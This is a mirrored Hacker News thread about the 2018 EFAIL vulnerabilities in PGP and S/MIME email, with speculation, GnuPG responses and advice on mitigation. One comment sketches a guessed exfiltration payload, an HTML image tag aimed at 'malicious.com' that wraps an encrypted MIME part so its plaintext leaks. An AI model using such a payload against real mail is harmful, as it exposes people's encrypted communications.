TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

A new set of vulnerabilities affecting users of PGP and S/MIME

288 点作者 rdhyee大约 7 年前

21 条评论

fensipens大约 7 年前
Response by Werner Koch (GPG), contains some details:<p><a href="https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;060315.html" rel="nofollow">https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;06031...</a>
评论 #17063910 未加载
评论 #17063765 未加载
评论 #17064179 未加载
bo1024大约 7 年前
Here&#x27;s a guess at what the &quot;attack&quot; might look like.<p>First, you need to know that each MIME email is made up of a series of subcomponents, which the email client interprets and concatenates. One subcomponent could be PGP encrypted while the next is not.<p>So given an old email where message X was encrypted to form a component Encr(X), simply write a new email of the form:<p><pre><code> Part 1: &lt;img src=http:&#x2F;&#x2F;malicious.com&#x2F;?q=&quot; Part 2: Encr(X) Part 3: &quot;&gt;</code></pre> Then the client might decrypt this to the message &lt;img src=&quot;http: &#x2F;&#x2F;malicious.com&#x2F;?q=X&quot;&gt;. Which is fine until the email client decides to automatically execute any code it happens to be given in an email, in this case, load the image.<p>To be clear, I doubt very much that this is the attack, but it sounds like it&#x27;s along these lines.
Anonionman大约 7 年前
What about Keybase[1] app, and Autocrypt[2],PEP[3]? Even dough Keybase is not email client, it can be used to continue to communicate with users that have PGP&#x2F;GPG keys, over their app. And Autocrypt is Thunderbird extension, and PEP is for Outlook and Android.<p><a href="https:&#x2F;&#x2F;mastodon.social&#x2F;web&#x2F;statuses&#x2F;100026482838593277" rel="nofollow">https:&#x2F;&#x2F;mastodon.social&#x2F;web&#x2F;statuses&#x2F;100026482838593277</a><p>[1]: <a href="https:&#x2F;&#x2F;keybase.io&#x2F;" rel="nofollow">https:&#x2F;&#x2F;keybase.io&#x2F;</a><p>[2]: <a href="https:&#x2F;&#x2F;autocrypt.org&#x2F;" rel="nofollow">https:&#x2F;&#x2F;autocrypt.org&#x2F;</a><p>[3]: <a href="https:&#x2F;&#x2F;www.pep.security&#x2F;" rel="nofollow">https:&#x2F;&#x2F;www.pep.security&#x2F;</a>
评论 #17065497 未加载
jstanley大约 7 年前
Given that they recommend against decrypting any email, it sounds like the bug is some sort of remote-code-execution against the decryption step, that would then allow (among ~anything else) exfiltration of keys, ciphertexts, and plaintexts.<p>EDIT: Having read a bit more I&#x27;m not so convinced that this explanation makes sense.
评论 #17063431 未加载
rdl大约 7 年前
I&#x27;ve always handled PGP via cut-and-paste of the ascii armored block, through a text file on a ramdisk (or between systems), then using command-line pgp or gpg to decrypt, and the reverse. Not always on a VM or machine without external network access, but for signing keys for software and stuff, yes. It just seemed too easy to mess up auto-decrypt&#x2F;auto-encrypt and accidentally send out cleartext -- the cut and paste or textfile intermediate step makes it verifiable.<p>Unless there&#x27;s a protocol bug where the message itself can include &quot;dump the secret key to a public keyserver on decrypt&quot;, I&#x27;m not too worried.<p>(I also don&#x27;t use PGP for routine communications, because it&#x27;s so inconvenient to use it, and due to lack of a good mobile solution. Signal, or for routine email, tls to a mail server I control is fine too.)
评论 #17066208 未加载
评论 #17064024 未加载
keSSeaj大约 7 年前
&quot;They figured out mail clients which don&#x27;t properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S&#x2F;MIME has no deployed mitigation.&quot;<p>- by GnuPG (<a href="https:&#x2F;&#x2F;twitter.com&#x2F;gnupg&#x2F;status&#x2F;995931083584757760" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;gnupg&#x2F;status&#x2F;995931083584757760</a>)
评论 #17063917 未加载
jimrandomh大约 7 年前
&gt; Our advice, which mirrors that of the researchers, is to immediately disable and&#x2F;or uninstall tools that automatically decrypt PGP-encrypted email.<p>This advice strongly suggests a side-channel attack, not anything which affects encrypted data at rest. The worst case is that PGP has a remote code execution vulnerability in the decryption step.
jwilk大约 7 年前
This doesn&#x27;t make sense.<p>PGP is encryption software, whereas S&#x2F;MIME is an encryption standard.<p>It&#x27;s like saying that a vulnerability affetcts users of OpenSSL and RSA.
评论 #17063461 未加载
评论 #17063444 未加载
评论 #17063473 未加载
tasqa大约 7 年前
This seems way overblown. An in-depth explanation Werner as to why this is most likely not an issue if you&#x27;re GPG is &gt; 2.1.9 [1]<p>An (older) example of expected behaviour [2].<p>[1] <a href="https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;060320.html" rel="nofollow">https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;06032...</a> [2] <a href="https:&#x2F;&#x2F;sourceforge.net&#x2F;p&#x2F;enigmail&#x2F;bugs&#x2F;538&#x2F;#43ff" rel="nofollow">https:&#x2F;&#x2F;sourceforge.net&#x2F;p&#x2F;enigmail&#x2F;bugs&#x2F;538&#x2F;#43ff</a>
runesoerensen大约 7 年前
<i>&quot;Due to our embargo being broken, here are the full details of the #efail attacks. <a href="https:&#x2F;&#x2F;efail.de&#x2F;" rel="nofollow">https:&#x2F;&#x2F;efail.de&#x2F;</a> &quot;</i><p><a href="https:&#x2F;&#x2F;twitter.com&#x2F;seecurity&#x2F;status&#x2F;995964977461776385" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;seecurity&#x2F;status&#x2F;995964977461776385</a><p>Discussion <a href="https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=17064129" rel="nofollow">https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=17064129</a>
mFixman大约 7 年前
This is an email client vulnerability, not a PGP one. The obvious solution is to not use a client that autoloads HTML to decrypt your emails.
skunkworker大约 7 年前
I&#x27;m a little confused. Is this an attack on the PGP protocol or just an attack on the software implementation of PGP?<p>The advice they give seems to indicate that somehow a well-crafted payload can expose the secret PGP key from &quot;tools that automatically decrypt PGP-encrypted email.&quot;<p>This seems to me that it is an implementation-level attack and not a protocol attack on the basis for PGP. Is anyone else getting that same thought?
评论 #17063456 未加载
pdfernhout大约 7 年前
From an essay I wrote in 2015 on &quot;Why Encryption Use Is Problematical When Advocating For Social Change&quot;: <a href="http:&#x2F;&#x2F;pdfernhout.net&#x2F;why-encryption-use-is-problematical-when-advocating-for-social-change.html" rel="nofollow">http:&#x2F;&#x2F;pdfernhout.net&#x2F;why-encryption-use-is-problematical-wh...</a> &quot;In general, a system intended to ensure private communications is only as secure as its weakest link. If any of these levels is compromised (hardware, firmware, OS, application, algorithm theory, algorithm implementation, user error, user loyalty, etc.) then your communications are compromised. ... If you want to build a mass movement, at some point, you need to engage people. In practice, for social psychology reasons, engaging people is very difficult, if not impossible, to do completely anonymously in an untraceable way. People have historically built mass movements without computers or the internet. It&#x27;s not clear if the internet really makes this easier for activists or instead just for the status quo who wants to monitor them. If you work in public, you don&#x27;t have to fear loss of secure communications because you never structure your movement to rely on them. If you rely on &quot;secure&quot; communications, then you may set yourself up to fail when such communications are compromised. If your point is to build a mass movement, then where should your focus be? ...&quot;
dathinab大约 7 年前
I wouldn&#x27;t be surprised if this is either:<p>1. A bug in a library any pgp implementation uses, likely allowing even remote code execution<p>2. A bad Interaktion with some other mail &quot;extension&quot;* e.g. external bodies<p>*With extension I mean anything added to mail in a later rfc, which isn&#x27;t really an extension in the classical sense but I&#x27;m not sure what to call it otherwise
dredmorbius大约 7 年前
Any word on whether or not mutt is affected?
FrantaH大约 7 年前
Ok, healthcare messaging in US is based on S&#x2F;MIME (<a href="http:&#x2F;&#x2F;wiki.directproject.org&#x2F;" rel="nofollow">http:&#x2F;&#x2F;wiki.directproject.org&#x2F;</a>). According to EFF, it should be shut down now?
zaarn大约 7 年前
Yeah that sounds pretty bad. It is possibly some injection attack since it mentions automatic decryption of PGP. Or maybe some fundamental flaw in the formats... How exciting!
arca_vorago大约 7 年前
My main question is does it affect gpg as well?
评论 #17063336 未加载
评论 #17063333 未加载
huwthecreator大约 7 年前
This seems like some code-execution thing. I suspect that the vulnerability executes a command when text is decrypted
newman314大约 7 年前
It&#x27;s not clear to me if PGP encrypted files are affected if it&#x27;s not email.
logicallee大约 7 年前
I think PGP should implement a centralized auto-update mechanism so that software can disable itself in cases as severe as listed (with advice to &quot;immediately disable and&#x2F;or uninstall tools that automatically decrypt PGP-encrypted email&quot;).<p>[I&#x27;ve removed an earlier longer version of this comment.]
评论 #17063346 未加载
评论 #17063364 未加载